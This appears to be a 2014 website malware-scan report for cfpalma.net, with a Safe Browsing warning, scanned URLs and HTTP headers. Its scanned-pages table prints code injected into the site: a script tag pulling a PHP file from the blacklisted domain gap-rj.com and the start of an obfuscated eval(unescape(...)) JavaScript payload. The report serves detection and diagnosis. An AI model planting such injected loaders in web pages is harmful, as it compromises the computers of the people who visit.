Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cfpalma.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cfpalma.net/ | 200 OK Content-Length: 8001 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gap-rj.com <script type="text/javascript" src="http://gap-rj.com/cgi-bin/zMnDk6BH.php?id=11912612"></script><html>
<head> </head> <body> <script type="text/javascript"> <!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%63%62%34%65%33%33%34%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%35%38%39%30%35%33%37%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65% ...[7849 bytes skipped]... | ||
http://gap-rj.com/cgi-bin/zMnDk6BH.php?id=11912612 | 200 OK Content-Length: 6484 Content-Type: text/html | clean |
http://gap-rj.com/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://gap-rj.com/cgi-bin/zMnDk6BH.php?id=11912629 | 200 OK Content-Length: 6484 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cfpalma.net
Result:
HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 27 Apr 2014 23:06:09 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.26 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 27 Apr 2014 23:06:11 GMT
Set-Cookie: SESS639583bec16bfe095a8ca1c17596637c=68db5b7c0b64fb67ba3e0dbbfffa120e; expires=Wed, 21 May 2014 02:39:31 GMT; path=/; domain=.cfpalma.net
X-Died: timeout at scan.pm line 1538.
X-Powered-By: PHP/5.2.4-2ubuntu5.26
GET / HTTP/1.1
Host: cfpalma.net
Result:
HTTP/1.1 200 OK
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 27 Apr 2014 23:06:09 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.26 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 27 Apr 2014 23:06:11 GMT
Set-Cookie: SESS639583bec16bfe095a8ca1c17596637c=68db5b7c0b64fb67ba3e0dbbfffa120e; expires=Wed, 21 May 2014 02:39:31 GMT; path=/; domain=.cfpalma.net
X-Died: timeout at scan.pm line 1538.
X-Powered-By: PHP/5.2.4-2ubuntu5.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: cfpalma.net
Referer: http://www.google.com/search?q=cfpalma.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cfpalma.net
Referer: http://www.google.com/search?q=cfpalma.net
Result:
The result is similar to the first query. There are no suspicious redirects found.